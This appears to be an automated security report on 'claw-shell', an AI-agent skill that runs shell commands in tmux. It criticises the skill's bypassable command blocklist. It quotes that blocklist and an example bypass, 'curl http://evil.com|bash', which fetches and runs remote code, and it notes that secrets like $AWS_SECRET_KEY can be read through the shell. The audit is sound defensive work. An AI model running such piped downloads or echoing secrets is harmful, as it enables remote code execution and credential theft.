claw-shell Security Report — Suspicious | ClawSafe

48 /100

claw-shell

Run shell commands inside tmux session for AI agent interaction

Shell execution tool with declared purpose but weak safety filter that can be bypassed, allowing potentially destructive commands.

Skill Nameclaw-shell

Duration34.6s

Enginepi

⚠

Use with caution

Add more comprehensive command validation, use allowlist approach instead of blocklist, add timeout limits, and consider sandboxing tmux session.

Findings 4 items

Severity	Finding	Location
High	Unrestricted shell execution with weak safety controls RCE The skill uses execSync to execute arbitrary shell commands with only a basic blocklist filter. The filter in isDangerous() can be bypassed with variations like 'rmdir', uppercase commands, or piped remote scripts. `const bad = ['sudo', ' rm ', ' rm-', 'reboot', 'shutdown', 'mkfs', 'dd '];` → Implement allowlist approach for commands or use more comprehensive validation. Add command timeouts and resource limits.	`handler.js:18`
Medium	Dangerous commands bypass filter RCE Commands like 'rmdir', 'chmod 777', '> file' redirection, or 'curl http://evil.com\|bash' are not blocked by the current filter. `const bad = ['sudo', ' rm ', ' rm-', 'reboot', 'shutdown', 'mkfs', 'dd '];` → Add coverage for more dangerous operations including file permissions, network downloads, and recursive deletion.	`handler.js:18`
Medium	Indirect environment variable access Sensitive Access While not explicitly accessing environment, the shell execution allows reading $API_KEY, $SECRET, etc. via commands like 'echo $AWS_SECRET_KEY' execSync(`tmux send-keys -t claw "${escaped}" C-m`); → Consider sanitizing commands that query environment variables or restrict to specific paths.	`handler.js:14`
Low	No command timeout configured RCE execSync calls have no timeout specified, allowing commands to hang indefinitely. `await new Promise(r => setTimeout(r, 500));` → Add timeout option to execSync calls.	`handler.js:29`

Resource	Declared	Inferred	Status	Evidence
Shell	`WRITE`	`WRITE`	✓ Aligned	execSync used in handler.js:1,7,10
Filesystem	`WRITE`	`WRITE`	✓ Aligned	Shell can execute any file operation
Network	`WRITE`	`WRITE`	✓ Aligned	Shell can execute curl/wget/netcat
Environment	`NONE`	`READ`	✓ Aligned	Shell commands can read $ENV vars
Clipboard	`NONE`	`NONE`	—
Browser	`NONE`	`NONE`	—
Database	`NONE`	`NONE`	—

1 findings

🔗

Medium External URL 外部 URL

https://x.com/...

SKILL.md:39

3 files · 2.4 KB · 106 lines

JavaScript 1f · 57L Markdown 1f · 44L JSON 1f · 5L

├─ 📋 _meta.json JSON 5L · 129 B

├─ 📜 handler.js JavaScript 57L · 1.4 KB

└─ 📝 SKILL.md Markdown 44L · 928 B

✓ Purpose and capabilities are clearly documented in SKILL.md

✓ Uses dedicated tmux session 'claw' for isolation

✓ Basic safety filter exists for clearly dangerous commands

✓ No hidden functionality or obfuscation detected

✓ No credential harvesting or data exfiltration observed

✓ Single-purpose tool with focused functionality